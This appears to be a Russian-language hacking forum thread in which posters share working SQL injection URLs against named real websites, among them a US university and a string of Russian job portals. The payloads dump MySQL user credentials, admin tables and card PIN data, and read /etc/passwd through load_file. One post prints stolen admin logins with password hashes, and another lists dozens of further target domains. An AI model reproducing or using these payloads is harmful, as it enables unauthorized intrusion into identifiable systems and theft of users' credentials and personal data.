University of Arkansas Pine Bluff =) Code: http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,user(),3,4,version(),6,7/* Code: http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,concat(user,0x3a,password),3,4,5,6,7+from+mysql.user/* Code: http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,2,3,4,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,7/* Code: http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,2,3,4,load_file(char(47,101,116,99,47,104,111,115,116,115)),6,7/* Code: http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,concat(AdminID,0x3a,AdminName,0x3a,AdminLoginName,0x3a,AdminPassword),3,4,5,6,7+from+admin/*
Шо за нах? Вообще то там три столбца.... То бишь вот так: http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3/*
Code: http://www.vkks.ru/edit_ks.php?id=-1508%20union%20select%201,2,3,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),1),1),5,6,7,8,9,10,11%20from%20mysql.user/*
http://www.zonewm.biz/showasf.php?id=4+union+select+1,mail,3,pass,5,6,7,8,9+from+user/* http://www.webmarket.mobi/wm.php?id=3+union+select+1,2,table_name,4,5,6+from+information_schema.tables/* http://www.webmarket.mobi/wm.php?id=3+union+select+1,p_user,pin_kod,4,ktype_karta,6+from+karty_pin/*
Code: http://www.rabota-chelyabinsk.info/agency.php?r=vac&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x203a20,email,pass),21,22,23,24,25,26,27,28,29+from+jobsmarket_spb.users урлы = бд PR от 1 до 5: Code: rabota-belgorod.info rabota-bryansk.info rabota-chelyabinsk.info rabota-chita.info rabota-ekaterenburg.info rabota-ekaterinburg.info rabota-irk.info rabota-izhevsk.info rabota-kaluga.info rabota-kazan.info rabota-khabarovsk.info rabota-kirov.info rabota-kostroma.info rabota-krasnodar.info rabota-krasnoyarsk.info rabota-kursk.info rabota-lipetsk.info rabota-murmansk.info rabota-norilsk.info rabota-nsb.info rabota-nsk.info rabota-omsk.info rabota-orel.info rabota-orenburg.info rabota-penza.info rabota-perm.info rabota-pskov.info rabota-rostov.info rabota-ryazan.info rabota-samara.info rabota-saratov.info rabota-smolensk.info rabota-spb.info rabota-stavropol.info rabota-tambov.info rabota-tomsk.info rabota-tula.info rabota-tver.info rabota-tyumen.info rabota-ufa.info rabota-ulyanovsk.info rabota-volgograd.info rabota-voronezh.info rabota-yaroslavl.info rabota-yugra.info
Code: http://www.geenivaramu.ee/index.php?sub=-15%20union%20select%201,2,AES_DECRYPT(AES_ENCRYPT(concat(name,0x3a,pass),1),1),4,5%20from%20users%20limit%201,1/* там basic авторизация, первый пароль не подошел
Ms-sql Сайт: www.doorsopendays.com inj: 1'+or+1= Версия: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) Имя БД: doorsopendays Code: http://www.doorsopendays.com/communities.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('comd_list','Buildings','Communities','dtproperties','Maps','sysconstraints','syssegments','cmd','D99_CMD','D99_REG','D99_Tmp','kill_kk'))--
www.wanna-be.tv 9 юзеров Code: http://www.wanna-be.tv/items.php?item=99999999+union+select+1,id,3,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,password,38+from+users+limit+0,1/*
www.active-video.net Code: http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12/* sitemaster@localhost:5.0.22:zerinru_cms Code: http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat(table_schema,char(58),table_name),4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+column_name=0x6c6f67696e+limit+0,1/* вытаскиваем таблицу с юзерами:zerinru_cms:users_mk Code: http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat(table_schema,char(58),COLUMN_NAME),4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name='users_mk'+limit+0,1/* узнаем имена колонок:ID,Login,Password,Email,Status Code: http://www.active-video.net/index.php?lang=rus&part=parts&id=14'+union+select+1,2,concat_ws(0x3a,login,password,ID,Email),4,5,6,7,8,9,10,11,12+from+users_mk/* =)) admin:8dc6eab8d5b075c7523797412cba4564:1:[email protected] news:bd27bd83e6598a329eaee5c62a876726:2:[email protected] user:e7c3218ac64594c02bc5c793f5c6b99a:3:none
Code: http://www.leform.ru/design.php?id=430%20union%20select%201,name,id,4,5,6,7,8,9%20from%20designer/* джэс тур Code: http://www.bali-welcome.ru/hotel6.php?id=430%20union%20select%201,2,3,4,5,concat(user(),char(58),database()),7/*
Уруру - http://www.webfile.ru/files.php?search=gemaglabin')+and+1=0+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14+From+INFORMATION_SCHEMA.TABLES+LIMIT+1,1/*
Вопрос от новичка: тестирую www.ukazatel.ru/search.php инъекцию допускает, но ничего путного извлечь не мог, результаты запроса не сразу выводятся, а идут дальше в другой запрос. Это что значит, что инъекция тут невозможнп?
Иркутский филиал СТК. 36 таблиц с паролями x_X Code: http://www.esir.ru/ru/contact/forum/s/p/?checkforums=1&checksubject=-1+union+select+1,2,3,4,5,concat_ws(0x203a20,user(),version(),database()),count(concat_ws(0x203a20,table_schema,table_name,column_name)),8,9,10,11,12,13,14,15+from+information_schema.columns+where+column_name="passwd"+or+column_name="password"+or+column_name="pass" Для красивого вывода можно было бы раскрутить _http://www.esir.ru/ru/contact/forum/s/?checkforums=-1+or+1=2 но чего-то не получилось =\
sibrabota.ru - Работа в Красноярске и Сибири version: 4.1.22-standard user: sibrabota@localhost database: sibrabota Не везет мне на четверки. Подбор таблиц закончился неудачно. Может быть у вас что выйдет.
